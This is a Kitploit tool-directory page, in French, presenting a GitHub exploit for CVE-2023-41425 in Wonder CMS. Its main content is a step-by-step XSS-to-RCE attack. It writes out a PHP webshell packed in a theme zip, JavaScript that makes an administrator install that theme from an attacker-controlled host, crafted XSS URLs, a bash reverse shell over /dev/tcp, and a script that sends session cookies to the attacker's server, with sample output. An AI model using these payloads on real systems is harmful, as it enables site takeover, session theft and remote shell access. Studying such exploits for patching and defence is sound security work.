Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-41425 — Exploit XSS-to-RCE pour Wonder CMS 3.2.0–3.4.2 avec injection automatique de thème, déploiement de webshell PHP, reverse shell et vol de cookies via des charges utiles JavaScript conçues. | Kitploit
Outils/GitHubGitHub/raffli-dev/cve-2023-41425
Outils de PhishingGénération de PayloadsExploitationExploitation d'Applications WebOutil d'Accès à Distance
GitHubraffli-dev/cve-2023-41425

CVE-2023-41425

Exploit XSS-to-RCE pour Wonder CMS 3.2.0–3.4.2 avec injection automatique de thème, déploiement de webshell PHP, reverse shell et vol de cookies via des charges utiles JavaScript conçues.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

https://sploitus.com/exploit?id=3A833277-4844-5F02-AFEF-5EA6BA8AC1AC

############## Wonder CMS RCE ##############

| | Description : XSS vers RCE, Wonder CMS 3.2.0 <= 3.4.2 | Sources | - https://github.com/prodigiousMind/CVE-2023-41425/tree/main | - https://nvd.nist.gov/vuln/detail/CVE-2023-41425 |


RCE


.. code-block:: bash

Setting vars

$RHOST="http://host.com:80"
$LHOST="10.10.14.152"
$LPORT="4444"
$LPORTWEB="80"

Moving to a tmp dir

cd $(mktemp -d)

Creating our evil theme zip file

root@kitploit:~
mkdir -p evil
cat <<'EOF'>evil/evil.php
<?=`$_GET[0]`;?>
EOF
root@kitploit:~
zip -r evil.zip evil/

JS payload that will install the new theme

root@kitploit:~
cat <<EOF>xssrce.js
var xhr=new XMLHttpRequest();
xhr.open("GET", "${RHOST}/?installModule=http://${LHOST}:${LPORTWEB}/evil.zip&directoryName=whatever&type=themes&token=" + document.querySelectorAll('[name="token"]')[0].value, true);
xhr.send();
EOF

Print XSS url

root@kitploit:~
echo -e "\n# XSS RCE"
cat <<EOF
${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xssrce.js"></script><form+action="
EOF

Starting a new web server to serve payloads

root@kitploit:~
sudo python3 -m http.server $LPORTWEB &

|

| Après avoir envoyé l'XSS RCE à l'administrateur, nous obtenons les appels http suivants

.. code-block::

10.129.252.14 - - [11/Aug/2024 18:42:26] "GET /xssrce.js HTTP/1.1" 304 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:32] "GET /evil.zip HTTP/1.1" 200 -

|

| Nous pouvons désormais utiliser le payload php

.. code-block:: bash

id

CMD="id"

root@kitploit:~
curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell, (don't forget to listen first: nc -nvlp 4444)

CMD="bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"

curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

|


Cookies


| Vous pouvez également voler les cookies (et donc la session PHP)

.. code-block:: bash

cat <xsscookie.js var xhr=new XMLHttpRequest(); xhr.open("GET", "http://${LHOST}:${LPORTWEB}/?"+document.cookie, true); xhr.send(); EOF

echo -e "\n# XSS Retrieve PHP session" cat <<EOF ${RHOST}/index.php?page=loginURL?"><script+src="http://${LHOST}:${LPORTWEB}/xsscookie.js"><form+action=" EOF

|

Télécharger l’outil